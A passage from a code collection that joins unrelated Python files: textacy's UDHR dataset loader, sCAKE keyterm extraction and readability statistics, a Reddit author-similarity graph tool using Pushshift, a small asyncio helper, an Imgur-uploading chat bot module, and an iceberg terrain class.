print("\\n{} ({})\\n{}".format(meta["lang_name"], meta["lang"], text[:500])) >>> for text, meta in ds.records(lang="zh"): ... print("\\n{} ({})\\n{}".format(meta["lang_name"], meta["lang"], text[:500])) Note: Streaming translations into a :class:`textacy.Corpus <textacy.corpus.Corpus>` doesn't work as for other available datasets, since this dataset is multilingual. Args: data_dir (str or :class:`pathlib.Path`): Path to directory on disk under which the data is stored, i.e. ``/path/to/data_dir/udhr``. 
Attributes: langs (Set[str]): All distinct language codes with texts in this dataset, e.g. "en" for English. """ def __init__( self, data_dir: Union[str, pathlib.Path] = constants.DEFAULT_DATA_DIR.joinpath(NAME), ): super().__init__(NAME, meta=META) self.data_dir = utils.to_path(data_dir).resolve() self._texts_dirpath = self.data_dir.joinpath("udhr_txt") self._index_filepath = self._texts_dirpath.joinpath("index.xml") self._index = None self.langs = None def download(self, *, force: bool = False) -> None: """ Download the data as a zipped archive of language-specific text files, then save it to disk and extract its contents under the ``data_dir`` directory. Args: force: If True, download the dataset, even if it already exists on disk under ``data_dir``. """ filepath = tio.download_file( DOWNLOAD_URL, filename="udhr_txt.zip", dirpath=self.data_dir, force=force, ) if filepath: tio.unpack_archive(filepath, extract_dir=self.data_dir.joinpath("udhr_txt")) self._check_data() def _check_data(self): """Check that necessary data is found on disk, or raise an OSError.""" if not self._texts_dirpath.is_dir(): raise OSError( f"data directory {self._texts_dirpath} not found; " "has the dataset been downloaded?" ) if not self._index_filepath.is_file(): raise OSError( f"data index file {self._index_filepath} not found; " "has the dataset been downloaded?" ) @property def index(self) -> Optional[List[Dict[str, Any]]]: if not self._index: try: self._index = self._load_and_parse_index() except OSError as e: LOGGER.error(e) return self._index def _load_and_parse_index(self): """ Read in index xml file from :attr:`UDHR._index_filepath`; skip elements without valid ISO-639-1 language code or sufficient translation quality, then convert into a list of dicts with key metadata, including filenames. 
""" index = [] tree = xml.etree.ElementTree.parse(self._index_filepath) root = tree.getroot() for ele in root.iterfind("udhr"): iso_lang_code = ele.get("bcp47", "").split("-", 1)[0] stage = int(ele.get("stage")) if len(iso_lang_code) != 2 or stage < 3: continue else: index.append( { "filename": f"udhr_{ele.get('f')}.txt", "lang": iso_lang_code, "lang_name": ele.get("n"), } ) # get set of all available langs, so users can filter on it self.langs = {item["lang"] for item in index} return index def _load_and_parse_text_file(self, filepath): with io.open(filepath, mode="rt", encoding="utf-8") as f: text_lines = [line.strip() for line in f.readlines()] # chop off the header, if it exists try: header_idx = text_lines.index("---") text_lines = text_lines[header_idx + 1 :] except ValueError: pass return preprocessing.normalize_whitespace("\n".join(text_lines)) def __iter__(self): self._check_data() for item in self.index: filepath = self._texts_dirpath.joinpath(item["filename"]) record = item.copy() record["text"] = self._load_and_parse_text_file(filepath) yield record def _filtered_iter(self, lang): # this dataset is unusual in that the only filter we can really offer is lang # so we might as well avoid loading texts in unwanted languages if lang: self._check_data() lang = utils.validate_set_members(lang, str, valid_vals=self.langs) for item in self.index: if item["lang"] in lang: filepath = self._texts_dirpath.joinpath(item["filename"]) record = item.copy() record["text"] = self._load_and_parse_text_file(filepath) yield record else: for record in self: yield record def texts( self, *, lang: Optional[Union[str, Set[str]]] = None, limit: Optional[int] = None, ) -> Iterable[str]: """ Iterate over records in this dataset, optionally filtering by language, and yield texts only. Args: lang: Filter records by the language in which they're written; see :attr:`UDHR.langs`. limit: Yield no more than ``limit`` texts that match specified filter. Yields: Text of the next record in dataset passing filters. Raises: ValueError: If any filtering options are invalid. """ for record in itertools.islice(self._filtered_iter(lang), limit): yield record["text"] def records( self, *, lang: Optional[Union[str, Set[str]]] = None, limit: Optional[int] = None, ) -> Iterable[Tuple[str, dict]]: """ Iterate over reocrds in this dataset, optionally filtering by a language, and yield text + metadata pairs. Args: lang: Filter records by the language in which they're written; see :attr:`UDHR.langs`. limit: Yield no more than ``limit`` texts that match specified filter. Yields: Text of the next record in dataset passing filters, and its corresponding metadata. Raises: ValueError: If any filtering options are invalid. """ for record in itertools.islice(self._filtered_iter(lang), limit): yield record.pop("text"), record ``` #### File: src/textacy/errors.py ```python from typing import Any, Collection, Type def value_invalid_msg(name: str, value: Any, valid_values: Collection[Any],) -> str: return f"`{name}` value = {value} is invalid; value must be one of {valid_values}." def type_invalid_msg(name: str, val_type: Type, valid_val_type: Type,) -> str: return f"`{name}` type = {val_type} is invalid; type must match {valid_val_type}." 
``` #### File: textacy/ke/scake.py ```python import collections import itertools import operator from typing import ( cast, Callable, Collection, Counter, DefaultDict, Dict, Iterable, List, Optional, Set, Tuple, Union, ) import networkx as nx from cytoolz import itertoolz from spacy.tokens import Doc, Token from .. import utils from . import utils as ke_utils def scake( doc: Doc, *, normalize: Optional[Union[str, Callable[[Token], str]]] = "lemma", include_pos: Optional[Union[str, Collection[str]]] = ("NOUN", "PROPN", "ADJ"), topn: Union[int, float] = 10, ) -> List[Tuple[str, float]]: """ Extract key terms from a document using the sCAKE algorithm. Args: doc: spaCy ``Doc`` from which to extract keyterms. Must be sentence-segmented; optionally POS-tagged. normalize: If "lemma", lemmatize terms; if "lower", lowercase terms; if None, use the form of terms as they appeared in ``doc``; if a callable, must accept a ``Token`` and return a str, e.g. :func:`textacy.spacier.utils.get_normalized_text()`. include_pos: One or more POS tags with which to filter for good candidate keyterms. If None, include tokens of all POS tags (which also allows keyterm extraction from docs without POS-tagging.) topn: Number of top-ranked terms to return as key terms. If an integer, represents the absolute number; if a float, value must be in the interval (0.0, 1.0], which is converted to an int by ``int(round(len(candidates) * topn))`` Returns: Sorted list of top ``topn`` key terms and their corresponding scores. References: Duari, Swagata & <NAME>. (2018). sCAKE: Semantic Connectivity Aware Keyword Extraction. Information Sciences. 477. https://arxiv.org/abs/1811.10831v1 """ # validate / transform args include_pos = cast(Set[str], utils.to_collection(include_pos, str, set)) if isinstance(topn, float): if not 0.0 < topn <= 1.0: raise ValueError( "topn={} is invalid; " "must be an int, or a float between 0.0 and 1.0".format(topn) ) # bail out on empty docs if not doc: return [] # build up a graph of good words, edges weighting by adjacent sentence co-occurrence cooc_mat: Counter[Tuple[str, str]] = collections.Counter() # handle edge case where doc only has 1 sentence n_sents = itertoolz.count(doc.sents) for window_sents in itertoolz.sliding_window(min(2, n_sents), doc.sents): if n_sents == 1: window_sents = (window_sents[0], []) window_words: Iterable[str] = ( word for word in itertoolz.concat(window_sents) if not (word.is_stop or word.is_punct or word.is_space) and (not include_pos or word.pos_ in include_pos) ) window_words = ke_utils.normalize_terms(window_words, normalize) cooc_mat.update( w1_w2 for w1_w2 in itertools.combinations(sorted(window_words), 2) if w1_w2[0] != w1_w2[1] ) # doc doesn't have any valid words... 
if not cooc_mat: return [] graph = nx.Graph() graph.add_edges_from( (w1, w2, {"weight": weight}) for (w1, w2), weight in cooc_mat.items() ) word_scores = _compute_word_scores(doc, graph, cooc_mat, normalize) if not word_scores: return [] # generate a list of candidate terms candidates = _get_candidates(doc, normalize, include_pos) if isinstance(topn, float): topn = int(round(len(set(candidates)) * topn)) # rank candidates by aggregating constituent word scores candidate_scores = { " ".join(candidate): sum(word_scores.get(word, 0.0) for word in candidate) for candidate in candidates } sorted_candidate_scores = sorted( candidate_scores.items(), key=operator.itemgetter(1, 0), reverse=True ) return ke_utils.get_filtered_topn_terms( sorted_candidate_scores, topn, match_threshold=0.8 ) def _compute_word_scores( doc: Doc, graph: nx.Graph, cooc_mat: Dict[Tuple[str, str], int], normalize: Optional[Union[str, Callable[[Token], str]]], ) -> Dict[str, float]: word_strs: List[str] = list(graph.nodes()) # "level of hierarchy" component max_truss_levels = _compute_node_truss_levels(graph) max_truss_level = max(max_truss_levels.values()) # check for edge case when all word scores would be zero / undefined if not max_truss_level: return {} # "semantic strength of a word" component sem_strengths: Dict[str, int] = { w: sum( cooc_mat[tuple(sorted([w, nbr]))] * max_truss_levels[nbr] for nbr in graph.neighbors(w) ) for w in word_strs } # "semantic connectivity" component sem_connectivities = { w: len(set(max_truss_levels[nbr] for nbr in graph.neighbors(w))) / max_truss_level for w in word_strs } # "positional weight" component word_pos: DefaultDict[str, float] = collections.defaultdict(float) for word, word_str in zip(doc, ke_utils.normalize_terms(doc, normalize)): word_pos[word_str] += 1 / (word.i + 1) return { w: word_pos[w] * max_truss_levels[w] * sem_strengths[w] * sem_connectivities[w] for w in word_strs } def _get_candidates( doc: Doc, normalize: Optional[Union[str, Callable[[Token], str]]], include_pos: Set[str], ) -> Set[Tuple[str, ...]]: """ Get a set of candidate terms to be scored by joining the longest subsequences of valid words -- non-stopword and non-punct, filtered to nouns, proper nouns, and adjectives if ``doc`` is POS-tagged -- then normalized into strings. """ def _is_valid_tok(tok): return not (tok.is_stop or tok.is_punct or tok.is_space) and ( not include_pos or tok.pos_ in include_pos ) candidates = ke_utils.get_longest_subsequence_candidates(doc, _is_valid_tok) return { tuple(ke_utils.normalize_terms(candidate, normalize)) for candidate in candidates } def _compute_node_truss_levels(graph: nx.Graph) -> Dict[str, int]: """ Reference: <NAME> & Faber, Vance & <NAME>, David. (2018). Bounds and algorithms for $k$-truss. 
        https://arxiv.org/abs/1806.05523v1
    """
    max_edge_ks = {}
    is_removed: DefaultDict[tuple, int] = collections.defaultdict(int)
    triangle_counts = {
        edge: len(set(graph.neighbors(edge[0])) & set(graph.neighbors(edge[1])))
        for edge in graph.edges()
    }
    # rather than iterating over all theoretical values of k
    # let's break out early once all edges have been removed
    # max_edge_k = math.ceil(math.sqrt(len(triangle_counts)))
    # for k in range(1, max_edge_k):
    k = 1
    while True:
        to_remove = collections.deque(
            edge
            for edge, tcount in triangle_counts.items()
            if tcount < k and not is_removed[edge]
        )
        while to_remove:
            edge = to_remove.popleft()
            is_removed[edge] = 1
            for nbr in set(graph.neighbors(edge[0])) & set(graph.neighbors(edge[1])):
                for node in edge:
                    nbr_edge = (node, nbr)
                    try:
                        triangle_counts[nbr_edge] -= 1
                    except KeyError:
                        # oops, gotta reverse the node ordering on this edge
                        nbr_edge = (nbr, node)
                        triangle_counts[nbr_edge] -= 1
                    if triangle_counts[nbr_edge] == k - 1:
                        to_remove.append(nbr_edge)
                        is_removed[nbr_edge] = 1
            max_edge_ks[edge] = k - 1
        # here's where we break out early, if possible
        if len(is_removed) == len(triangle_counts):
            break
        else:
            k += 1
    max_node_ks = {
        node: max(k for edge, k in max_edge_ks.items() if node in edge)
        for node in graph.nodes()
    }
    return max_node_ks
```
#### File: textacy/preprocessing/remove.py
```python
import re
import unicodedata
from typing import Optional

from .resources import _get_punct_translation_table


def remove_accents(text: str, *, fast: bool = False) -> str:
    """
    Remove accents from any accented unicode characters in ``text``, either by
    replacing them with ASCII equivalents or removing them entirely.

    Args:
        text
        fast: If False, accents are removed from any unicode symbol
            with a direct ASCII equivalent; if True, accented chars
            for all unicode symbols are removed, regardless.

            .. note:: ``fast=True`` can be significantly faster than ``fast=False``,
               but its transformation of ``text`` is less "safe" and more likely
               to result in changes of meaning, spelling errors, etc.

    Returns:
        str

    See Also:
        For a more powerful (but slower) alternative, check out ``unidecode``:
        https://github.com/avian2/unidecode
    """
    if fast is False:
        return "".join(
            char
            for char in unicodedata.normalize("NFKD", text)
            if not unicodedata.combining(char)
        )
    else:
        return (
            unicodedata.normalize("NFKD", text)
            .encode("ascii", errors="ignore")
            .decode("ascii")
        )


def remove_punctuation(text: str, *, marks: Optional[str] = None) -> str:
    """
    Remove punctuation from ``text`` by replacing all instances of ``marks``
    with whitespace.

    Args:
        text
        marks: Remove only those punctuation marks specified here.
            For example, ",;:" removes commas, semi-colons, and colons.
            If None, *all* unicode punctuation marks are removed.

    Returns:
        str

    Note:
        When ``marks=None``, Python's built-in :meth:`str.translate()` is used
        to remove punctuation; otherwise, a regular expression is used.
        The former's performance is about 5-10x faster.
    """
    if marks:
        return re.sub("[{}]+".format(re.escape(marks)), " ", text, flags=re.UNICODE)
    else:
        return text.translate(_get_punct_translation_table())
```
#### File: textacy/text_stats/api.py
```python
import functools
import logging
from typing import Tuple

import pyphen
from cachetools import cached
from cachetools.keys import hashkey
from spacy.tokens import Doc

from .. import cache, extract
from . 
import basics, readability LOGGER = logging.getLogger(__name__) class TextStats: """ Class to compute a variety of basic and readability statistics for a given doc, where each stat is a lazily-computed attribute. .. code-block:: pycon >>> text = next(textacy.datasets.CapitolWords().texts(limit=1)) >>> doc = textacy.make_spacy_doc(text) >>> ts = textacy.text_stats.TextStats(doc) >>> ts.n_words 136 >>> ts.n_unique_words 80 >>> ts.entropy 6.00420319027642 >>> ts.flesch_kincaid_grade_level 11.817647058823532 >>> ts.flesch_reading_ease 50.707745098039254 Some stats vary by language or are designed for use with specific languages: .. code-block:: pycon >>> text = ( ... "Muchos años después, frente al pelotón de fusilamiento, " ... "el coronel Aureliano Buendía había de recordar aquella tarde remota " ... "en que su padre lo llevó a conocer el hielo." ... ) >>> doc = textacy.make_spacy_doc(text, lang="es") >>> ts = textacy.text_stats.TextStats(doc) >>> ts.n_words 28 >>> ts.perspicuity_index 56.46000000000002 >>> ts.mu_legibility_index 71.18644067796609 Each of these stats have stand-alone functions in :mod:`textacy.text_stats.basics` and :mod:`textacy.text_stats.readability` with more detailed info and links in the docstrings -- when in doubt, read the docs! Args: doc: A text document tokenized and (optionally) sentence-segmented by spaCy. """ def __init__(self, doc: Doc): self.doc = doc self.lang = doc.vocab.lang self.words = tuple( extract.words(doc, filter_punct=True, filter_stops=False, filter_nums=False) ) self._n_sents = None self._n_words = None self._n_unique_words = None self._n_long_words = None self._n_chars_per_word = None self._n_chars = None self._n_syllables_per_word = None self._n_syllables = None self._n_monosyllable_words = None self._n_polysyllable_words = None self._entropy = None @property def n_sents(self) -> int: """ Number of sentences in document. See Also: :func:`textacy.text_stats.basics.n_sents()` """ if self._n_sents is None: self._n_sents = basics.n_sents(self.doc) return self._n_sents @property def n_words(self) -> int: """ Number of words in document. See Also: :func:`textacy.text_stats.basics.n_words()` """ if self._n_words is None: self._n_words = basics.n_words(self.words) return self._n_words @property def n_unique_words(self) -> int: """ Number of *unique* words in document. See Also: :func:`textacy.text_stats.basics.n_unique_words()` """ if self._n_unique_words is None: self._n_unique_words = basics.n_unique_words(self.words) return self._n_unique_words @property def n_long_words(self) -> int: """ Number of long words in document. See Also: :func:`textacy.text_stats.basics.n_long_words()` """ # TODO: should we vary char threshold by lang? if self._n_long_words is None: self._n_long_words = basics.n_long_words( self.n_chars_per_word, min_n_chars=7, ) return self._n_long_words @property def n_chars_per_word(self) -> Tuple[int, ...]: """ Number of characters for each word in document. See Also: :func:`textacy.text_stats.basics.n_chars_per_word()` """ if self._n_chars_per_word is None: self._n_chars_per_word = basics.n_chars_per_word(self.words) return self._n_chars_per_word @property def n_chars(self) -> int: """ Total number of characters in document. See Also: :func:`textacy.text_stats.basics.n_chars()` """ if self._n_chars is None: self._n_chars = basics.n_chars(self.n_chars_per_word) return self._n_chars @property def n_syllables_per_word(self) -> Tuple[int, ...]: """ Number of syllables for each word in document. 
        See Also:
            :func:`textacy.text_stats.basics.n_syllables_per_word()`
        """
        if self._n_syllables_per_word is None:
            self._n_syllables_per_word = basics.n_syllables_per_word(
                self.words, self.lang,
            )
        return self._n_syllables_per_word

    @property
    def n_syllables(self) -> int:
        """
        Total number of syllables in document.

        See Also:
            :func:`textacy.text_stats.basics.n_syllables()`
        """
        if self._n_syllables is None:
            self._n_syllables = basics.n_syllables(self.n_syllables_per_word)
        return self._n_syllables

    @property
    def n_monosyllable_words(self) -> int:
        """
        Number of monosyllabic words in document.

        See Also:
            :func:`textacy.text_stats.basics.n_monosyllable_words()`
        """
        if self._n_monosyllable_words is None:
            self._n_monosyllable_words = basics.n_monosyllable_words(
                self.n_syllables_per_word,
            )
        return self._n_monosyllable_words

    @property
    def n_polysyllable_words(self) -> int:
        """
        Number of polysyllabic words in document.

        See Also:
            :func:`textacy.text_stats.basics.n_polysyllable_words()`
        """
        # TODO: should we vary syllable threshold by lang?
        if self._n_polysyllable_words is None:
            self._n_polysyllable_words = basics.n_polysyllable_words(
                self.n_syllables_per_word, min_n_syllables=3,
            )
        return self._n_polysyllable_words

    @property
    def entropy(self) -> float:
        """
        Entropy of words in document.

        See Also:
            :func:`textacy.text_stats.basics.entropy()`
        """
        if self._entropy is None:
            self._entropy = basics.entropy(self.words)
        return self._entropy

    @property
    def automated_readability_index(self) -> float:
        """
        Readability test for English-language texts. Higher value => more difficult text.

        See Also:
            :func:`textacy.text_stats.readability.automated_readability_index()`
        """
        return readability.automated_readability_index(
            self.n_chars, self.n_words, self.n_sents,
        )

    @property
    def automatic_arabic_readability_index(self) -> float:
        """
        Readability test for Arabic-language texts. Higher value => more difficult text.

        See Also:
            :func:`textacy.text_stats.readability.automatic_arabic_readability_index()`
        """
        if self.lang != "ar":
            LOGGER.warning(
                "doc lang = '%s', but automatic arabic readability index is meant "
                "for use on Arabic-language texts, only",
                self.lang,  # pass the lang so the '%s' placeholder is actually filled
            )
        return readability.automatic_arabic_readability_index(
            self.n_chars, self.n_words, self.n_sents,
        )

    @property
    def coleman_liau_index(self) -> float:
        """
        Readability test, not language-specific. Higher value => more difficult text.

        See Also:
            :func:`textacy.text_stats.readability.coleman_liau_index()`
        """
        return readability.coleman_liau_index(self.n_chars, self.n_words, self.n_sents)

    @property
    def flesch_kincaid_grade_level(self) -> float:
        """
        Readability test, not language-specific. Higher value => more difficult text.

        See Also:
            :func:`textacy.text_stats.readability.flesch_kincaid_grade_level()`
        """
        return readability.flesch_kincaid_grade_level(
            self.n_syllables, self.n_words, self.n_sents,
        )

    @property
    def flesch_reading_ease(self) -> float:
        """
        Readability test with several language-specific formulations.
        Higher value => easier text.

        See Also:
            :func:`textacy.text_stats.readability.flesch_reading_ease()`
        """
        return readability.flesch_reading_ease(
            self.n_syllables, self.n_words, self.n_sents, lang=self.lang
        )

    @property
    def gulpease_index(self) -> float:
        """
        Readability test for Italian-language texts. Higher value => easier text.
        See Also:
            :func:`textacy.text_stats.readability.gulpease_index()`
        """
        if self.lang != "it":
            LOGGER.warning(
                "doc lang = '%s', but gulpease index is meant for use on "
                "Italian-language texts, only",
                self.lang,
            )
        return readability.gulpease_index(self.n_chars, self.n_words, self.n_sents)

    @property
    def gunning_fog_index(self) -> float:
        """
        Readability test, not language-specific. Higher value => more difficult text.

        See Also:
            :func:`textacy.text_stats.readability.gunning_fog_index()`
        """
        return readability.gunning_fog_index(
            self.n_words, self.n_polysyllable_words, self.n_sents,
        )

    @property
    def lix(self) -> float:
        """
        Readability test for both English- and non-English-language texts.
        Higher value => more difficult text.

        See Also:
            :func:`textacy.text_stats.readability.lix()`
        """
        return readability.lix(self.n_words, self.n_long_words, self.n_sents)

    @property
    def mu_legibility_index(self) -> float:
        """
        Readability test for Spanish-language texts. Higher value => easier text.

        See Also:
            :func:`textacy.text_stats.readability.mu_legibility_index()`
        """
        if self.lang != "es":
            LOGGER.warning(
                "doc lang = '%s', but mu legibility index is meant for use on "
                "Spanish-language texts, only",
                self.lang,
            )
        return readability.mu_legibility_index(self.n_chars_per_word)

    @property
    def perspicuity_index(self) -> float:
        """
        Readability test for Spanish-language texts. Higher value => easier text.

        See Also:
            :func:`textacy.text_stats.readability.perspicuity_index()`
        """
        if self.lang != "es":
            LOGGER.warning(
                "doc lang = '%s', but perspicuity index is meant for use on "
                "Spanish-language texts, only",
                self.lang,
            )
        return readability.perspicuity_index(
            self.n_syllables, self.n_words, self.n_sents,
        )

    @property
    def smog_index(self) -> float:
        """
        Readability test, not language-specific. Higher value => more difficult text.

        See Also:
            :func:`textacy.text_stats.readability.smog_index()`
        """
        return readability.smog_index(self.n_polysyllable_words, self.n_sents)

    @property
    def wiener_sachtextformel(self) -> float:
        """
        Readability test for German-language texts. Higher value => more difficult text.

        See Also:
            :func:`textacy.text_stats.readability.wiener_sachtextformel()`
        """
        # check against "de", not "es": this formula targets German-language texts
        if self.lang != "de":
            LOGGER.warning(
                "doc lang = '%s', but wiener sachtextformel is meant for use on "
                "German-language texts, only",
                self.lang,
            )
        return readability.wiener_sachtextformel(
            self.n_words,
            self.n_polysyllable_words,
            self.n_monosyllable_words,
            self.n_long_words,
            self.n_sents,
            variant=1,
        )


@cached(cache.LRU_CACHE, key=functools.partial(hashkey, "hyphenator"))
def load_hyphenator(lang: str):
    """
    Load an object that hyphenates words at valid points, as used in LaTeX
    typesetting.

    Args:
        lang: Standard 2-letter language abbreviation. To get a list of valid
            values::

                >>> import pyphen; pyphen.LANGUAGES

    Returns:
        :class:`pyphen.Pyphen()`
    """
    LOGGER.debug("loading '%s' language hyphenator", lang)
    return pyphen.Pyphen(lang=lang)
```
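The `TextStats` properties above memoize by hand with `_attr is None` checks, a style that predates `functools.cached_property` (Python 3.8+). A minimal sketch of the same compute-once behavior using the stdlib helper; `LazyStats` is illustrative, not textacy's actual implementation:

```python
import functools

class LazyStats:
    def __init__(self, words):
        self.words = words

    @functools.cached_property
    def n_words(self):
        print("computing n_words once")
        return len(self.words)

stats = LazyStats(["many", "years", "later"])
assert stats.n_words == 3   # computed on first access, prints once
assert stats.n_words == 3   # served from the instance __dict__ thereafter
```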
{ "source": "8wgf3b/reddit-harvest", "score": 3 }
#### File: reddit-harvest/mining/analysis.py
```python
import networkx as nx
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
import os
from tqdm import tqdm
from sklearn.preprocessing import minmax_scale


def raw_matrix(data_loc='users/', period=None):
    period = str(period) if period else ''
    user_list = next(os.walk(data_loc))[1]
    file_names = data_loc + '{}/subreddits' + period + '.csv'
    df_list = []
    for user in tqdm(user_list):
        filename = file_names.format(user)
        try:
            df_list.append(pd.read_csv(filename, index_col=0,
                                       names=[user], header=0))
        except FileNotFoundError as e:
            print(e)
            continue
    raw_df = pd.concat(df_list, axis=1, sort=False).fillna(0)
    return raw_df


def modified_min_max_scaler(m, axis=0):
    m = m.astype('float')
    # mark zeros as missing so the scaler ignores them, then restore them after
    m[m == 0] = np.nan
    if axis == 0:
        m = minmax_scale(m)
    else:
        m = minmax_scale(m.T).T
    m[np.isnan(m)] = 0
    return m


def AGM_matrix(raw_df, node_type='u', norm=None):
    users_list = list(raw_df)
    subs_list = list(raw_df.index)
    # renamed from `raw_matrix`, which shadowed the function of the same name above
    raw_vals = raw_df.values
    if norm is not None:
        raw_vals = modified_min_max_scaler(raw_vals, norm)
    if node_type == 'r':
        raw_vals = raw_vals.T
    sim_matrix = 1 - np.exp(- raw_vals.T @ raw_vals)
    column_names = users_list if node_type == 'u' else subs_list
    return pd.DataFrame(data=sim_matrix, index=column_names, columns=column_names)


def create_graph(sim_df):
    dist = -np.log(sim_df)
    G = nx.Graph()
    names = sim_df.index
    size = len(names)
    G.add_nodes_from(sim_df.index)
    for i in tqdm(range(size - 1)):
        for j in range(i + 1, size):
            u = names[i]
            v = names[j]
            weight = dist[u][v]
            if weight == np.inf:
                continue
            G.add_edge(u, v, weight=weight)
    return G


def nbr_subgraph(G, node, n=20):
    edges = sorted(list(G.edges(node, data=True)), key=lambda x: x[2]['weight'])
    sg = nx.Graph()
    sg.add_edges_from(edges[:n])
    return sg


def graph_with_length(G):
    pos = nx.spring_layout(G, weight='weight')
    nx.draw_networkx(G, pos=pos)


def save_output(name, out_loc='outputs/', data_loc='users/', period=None):
    x = name.split('/')
    raw_df = raw_matrix(data_loc, period)
    norm = 0 if x[0] == 'u' else 1  # `==`, not `is`: identity checks on str literals are unreliable
    sim_df = AGM_matrix(raw_df, node_type=x[0], norm=norm)
    G = create_graph(sim_df)
    sub = nbr_subgraph(G, x[1], 10)
    graph_with_length(sub)
    period = str(period) if period else ''
    fname = out_loc + period + '_'.join(x) + '.png'
    plt.savefig(fname, dpi=1000)


if __name__ == '__main__':
    pass
```
#### File: reddit-harvest/mining/reddit.py
```python
import requests
from random import random
from functools import partial


def recent_authors(subreddit=None, total=100, c_ratio=None):
    # default lazily: a `c_ratio=random()` default would be evaluated once at
    # import time and then silently reused for every call
    if c_ratio is None:
        c_ratio = random()
    total = 500 if total > 500 else total
    sub_address = 'https://api.pushshift.io/reddit/submission/search'
    comm_address = 'https://api.pushshift.io/reddit/comment/search'
    params = {
        'fields': 'author'
    }
    if subreddit is not None:
        params['subreddit'] = subreddit
    auth_list = []
    params['size'] = int(round(total * (1 - c_ratio)))
    r = requests.get(sub_address, params=params).json()['data']
    auth_list.extend([x['author'] for x in r])
    params['size'] = int(round(total * c_ratio))
    r = requests.get(comm_address, params=params).json()['data']
    auth_list.extend([x['author'] for x in r])
    return list(set(auth_list) - {"AutoModerator", "[deleted]"})


def top_authors(subreddit=None, total=100, type='avg', period=30):
    comm_address = 'https://api.pushshift.io/reddit/comment/search'
    params = {
        'size': 0,
        'agg_size': total,
        'metadata': True,
        'aggs': 'author:score:' + type
    }
    if period is not None:
        params['after'] = '{}d'.format(period)
    if subreddit is not None:
        params['subreddit'] = subreddit
    r = requests.get(comm_address,
params=params).json()['aggs']['author:score'] auth_list = [x['key'] for x in r] return list(set(auth_list) - {"AutoModerator", "[deleted]"}) top_authors_avg = partial(top_authors, type='avg', period=30) top_authors_sum = partial(top_authors, type='sum', period=30) if __name__ == '__main__': print(top_authors_sum('the_donald')) ```
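A usage sketch for the two helpers above. The subreddit name and parameters are illustrative, and both calls assume the public Pushshift endpoints are reachable, which is not guaranteed:

```python
# illustrative only; wrap in try/except for real use
recent = recent_authors('learnpython', total=200, c_ratio=0.5)
top = top_authors('learnpython', total=50, type='sum', period=7)
print(len(set(recent) & set(top)), 'recent authors are also top scorers')
```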
{ "source": "8wgf3b/rpi_server", "score": 3 }
#### File: cogs/helper/util.py
```python
import asyncio
import functools


def aiofy(func):
    """Decorator: run a blocking function in the default executor so it can
    be awaited from a coroutine without stalling the event loop."""
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        loop = asyncio.get_event_loop()
        # run_in_executor() does not forward kwargs, so bind them up front
        pfunc = functools.partial(func, *args, **kwargs)
        return loop.run_in_executor(None, pfunc)
    return wrapper
```
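A usage sketch for `aiofy`, assuming the decorator above is importable; `time.sleep` stands in for whatever blocking work (disk, subprocess, GPIO) a bot cog might need to do without freezing the event loop:

```python
import asyncio
import time

@aiofy
def slow_square(x):
    time.sleep(0.5)   # placeholder for blocking work
    return x * x

async def main():
    # runs in a worker thread; the event loop stays responsive meanwhile
    print(await slow_square(4))   # -> 16

asyncio.run(main())
```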
{ "source": "8wgf3b/WAbot", "score": 3 }
#### File: 8wgf3b/WAbot/media.py
```python
import os

import cv2  # used by sudoku() below; missing from the original imports
import pyimgur
import requests

# croppedsquaredigits() and numonim() are assumed to come from a local
# sudoku-solver module elsewhere in the project; they are not defined here.


def echoimage(URL, file=False):
    """Re-upload an image to Imgur and return the new link."""
    im = pyimgur.Imgur(os.environ['IMGUR_CID'])
    # the URL could be uploaded directly, but this also exercises the temp directory
    if not file:
        response = requests.get(URL)
        if response.status_code == 200:
            with open("temp/echoim.jpg", 'wb') as f:
                f.write(response.content)
        uploaded_image = im.upload_image("temp/echoim.jpg", title="twilwhatbot")
    else:
        uploaded_image = im.upload_image(URL, title="twilwhatbot")
    return uploaded_image.link


def clean(path='temp/', log=False):
    """Delete everything in ``path`` except .gitkeep; optionally list leftovers."""
    for file in os.listdir(path):
        if file == '.gitkeep':
            continue
        file_path = os.path.join(path, file)
        try:
            if os.path.isfile(file_path):
                os.unlink(file_path)
        except Exception as e:
            print(e)
    if log:
        return '\n'.join(os.listdir(path))


def sudoku(URL):
    """Download a sudoku image, solve it, and upload the annotated result."""
    im = pyimgur.Imgur(os.environ['IMGUR_CID'])
    response = requests.get(URL)
    if response.status_code == 200:
        with open("temp/sudoku.jpg", 'wb') as f:
            f.write(response.content)
    cropped, squares, digits = croppedsquaredigits('temp/sudoku.jpg')
    frame = numonim(cropped, squares, digits)
    cv2.imwrite('temp/solvedsudoku.jpg', frame)
    uploaded_image = im.upload_image("temp/solvedsudoku.jpg", title="twilwhatbot")
    return uploaded_image.link


if __name__ == '__main__':
    print(clean(log=True))
```
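The module above funnels every download through fixed paths such as `temp/echoim.jpg`, which would collide if two requests arrived at once. A sketch of the same download step using `tempfile` for unique paths; the function name is illustrative:

```python
import os
import tempfile
import requests

def fetch_to_tempfile(url):
    """Download ``url`` into a unique temp file and return its path."""
    resp = requests.get(url)
    resp.raise_for_status()      # surface HTTP errors instead of continuing silently
    fd, path = tempfile.mkstemp(suffix=".jpg")
    with os.fdopen(fd, "wb") as f:
        f.write(resp.content)
    return path                  # caller removes the file when done with it
```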
{ "source": "8woodcockd/white_star_line-model", "score": 3 }
#### File: 8woodcockd/white_star_line-model/terrain.py ```python class Ice: """Assign attributes to each identified ice cell. """ def __init__(self, i, j, radar, lidar, lidar_unit_height, pixel_area, ice_mass_density, fraction_ice_asl, cols_radar): """Assign attributes to each identified ice cell. """ self._x = j self._y = i self._radar = radar[i][j] self._lidar = lidar[i][j] self._id = 0 self._height = lidar[i][j] * lidar_unit_height self._volume_asl = self.height * pixel_area self._volume_tot = self.volume_asl * (1 / fraction_ice_asl) self._mass_asl = self.volume_asl * ice_mass_density self._mass_tot = self.mass_asl * (1 / fraction_ice_asl) self._cols_radar = cols_radar self._neighbours = [] self._tug = False @property def x(self): """The x position (easting). Specify the conditions to get_x, set_x, and del_x. """ if self._x < self._cols_radar: return self._x else: print('The x value is outside of the acceptable range.') @x.setter def x(self, value): if isinstance(value, int) == False: print('x value must be integer') return if 0 <= value <= self._cols_radar: self._x = value else: print('x value entered is outside of the acceptable range') @x.deleter def x(self): print('You cannot delete the ice.x attributes.') return @property def y(self): """The y position (northing). Specify the conditions to get_y, the conditions to set_y and the conditions to del_y. """ if self._y < self._cols_radar: return self._y else: print('The y value is outside of the acceptable range.') @y.setter def y(self, value): if isinstance(value, int) == False: print('y value must be integer') return if 0 <= value <= self._cols_radar: self._y = value else: print('y value entered is outside of the acceptable range') 